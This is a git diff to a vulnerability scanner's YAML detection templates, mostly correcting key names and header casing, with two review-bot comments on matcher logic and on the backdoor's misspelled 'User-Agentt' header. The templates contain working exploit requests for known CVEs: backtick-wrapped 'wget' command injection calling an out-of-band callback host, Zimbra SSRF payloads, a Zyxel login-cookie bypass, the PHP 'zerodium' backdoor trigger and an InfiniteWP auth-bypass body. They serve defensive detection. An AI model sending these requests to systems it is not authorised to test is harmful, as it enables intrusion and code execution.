diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml index 77a2a57b9d..d367f5e9a6 100644 --- a/cves/2019/CVE-2019-0193.yaml +++ b/cves/2019/CVE-2019-0193.yaml @@ -5,7 +5,7 @@ info: description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. author: pdteam severity: critical - refrense: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://paper.seebug.org/1009/ diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index abdacb5528..c13e0e6df5 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -20,7 +20,7 @@ requests: url=https://{{Hostname}}:443@{{interactsh-url}} headers: - X-Atlassian-token: no-check + X-Atlassian-Token: no-check Content-Type: application/x-www-form-urlencoded matchers: diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index 2bf5ae0888..a4d926f2a5 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml 
@@ -16,14 +16,14 @@ requests: - | GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 6f02ee6688..70fc14a6ca 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. - reference: | + reference: - https://www.adminxe.com/2183.html tags: cve,cve2020,zimbra,ssrf,oob @@ -14,7 +14,7 @@ requests: - | GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index dd73110c6d..383ea4d3fe 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml 
@@ -4,7 +4,7 @@ info: description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. author: gy741 severity: high - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass tags: cve,cve2021,zyxel,auth-bypass,router @@ -18,7 +18,7 @@ requests: Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive - cookie: language=en; login=1 + Cookie: language=en; login=1 matchers-condition: and matchers: diff --git a/network/cisco-smi-exposure.yaml b/network/cisco-smi-exposure.yaml index 438ecd7920..212bbf0f1b 100644 --- a/network/cisco-smi-exposure.yaml +++ b/network/cisco-smi-exposure.yaml @@ -9,7 +9,7 @@ info: connecting to the specified Cisco Smart Install port and determines if it speaks the Smart Install Protocol. Exposure of SMI to untrusted networks can allow complete compromise of the switch. - references: | + reference: - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi diff --git a/technologies/mautic-crm-detect.yaml b/technologies/mautic-crm-detect.yaml index 42d0c4df6f..9d2f535e1d 100644 --- a/technologies/mautic-crm-detect.yaml +++ b/technologies/mautic-crm-detect.yaml @@ -14,7 +14,7 @@ requests: path: - "{{BaseURL}}/s/login" - matcherscondition: or + matchers-condition: or matchers: - type: word part: body diff --git a/technologies/sap-web-dispatcher-admin-portal.yaml b/technologies/sap-web-dispatcher-admin-portal.yaml index c403098fb1..f6f7c62464 100644 --- a/technologies/sap-web-dispatcher-admin-portal.yaml +++ b/technologies/sap-web-dispatcher-admin-portal.yaml 
@@ -19,20 +19,20 @@ requests: matchers: - type: word part: header - conditions: or + condition: or words: - "Basic realm=\"WEB ADMIN\"" - "SAP NetWeaver Application Server" - type: status - conditions: or + condition: or status: - 401 - 200 - type: word part: body - conditions: or + condition: or words: - "SAP Web Dispatcher" - "Administration" \ No newline at end of file diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 469a6fa8b1..9c2df26245 100644 --- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -12,7 +12,7 @@ requests: path: - "{{BaseURL}}" headers: - User-Agentt: zerodiumvar_dump(233*233); + User-Agent: zerodiumvar_dump(233*233); matchers-condition: and matchers: diff --git a/vulnerabilities/other/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml index a384753cdb..51b5a3253c 100644 --- a/vulnerabilities/other/sick-beard-xss.yaml +++ b/vulnerabilities/other/sick-beard-xss.yaml @@ -8,7 +8,7 @@ info: reference: - https://sickbeard.com/ # vendor homepage - https://github.com/midgetspy/Sick-Beard # software link - customAttributes: + additional-fields: shodan-dork: sickbeard requests: diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml index 4b700e84a1..a67e1f1177 100644 --- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -4,7 +4,7 @@ info: name: Zimbra Collaboration Suite (ZCS) - SSRF author: gy741 severity: critical - reference: | + reference: - https://www.adminxe.com/2183.html tags: zimbra,ssrf,oob 
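Review bot: In technologies/sap-web-dispatcher-admin-portal.yaml the body matcher's corrected `condition: or` lets the generic word "Administration" satisfy it on its own, so pages unrelated to SAP can pass this matcher. The misspelled `conditions` key was presumably ignored before, so this is a good moment to decide per matcher whether `or` is really intended. For the body matcher I would either drop "Administration" or require both words with `condition: and`. Whether the three matchers are combined with `and` depends on a `matchers-condition` line above line 19, outside this hunk; if it is missing and the engine defaults to `or`, the status matcher (200 or 401) alone would flag almost any host. The file also still ends without a trailing newline.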
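Review bot: In vulnerabilities/other/php-zerodium-backdoor-rce.yaml the rename of `User-Agentt` to `User-Agent` looks like a typo fix but most likely turns this check into a false negative. The backdoored PHP build this template is named after is publicly documented as reading the misspelled `User-Agentt` header, so with the standard header name an affected host would be reported as clean. I would keep the original line `User-Agentt: zerodiumvar_dump(233*233);` and put a comment above it such as `# "User-Agentt" is intentional: the backdoor reads this misspelled header, do not normalise`. The matchers that evaluate the response are below the hunk, so I could not check what they expect.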
@@ -13,7 +13,7 @@ requests: - | GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive diff --git a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml index c51387653c..1f8a3bb2db 100644 --- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml +++ b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml @@ -29,7 +29,6 @@ requests: Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}}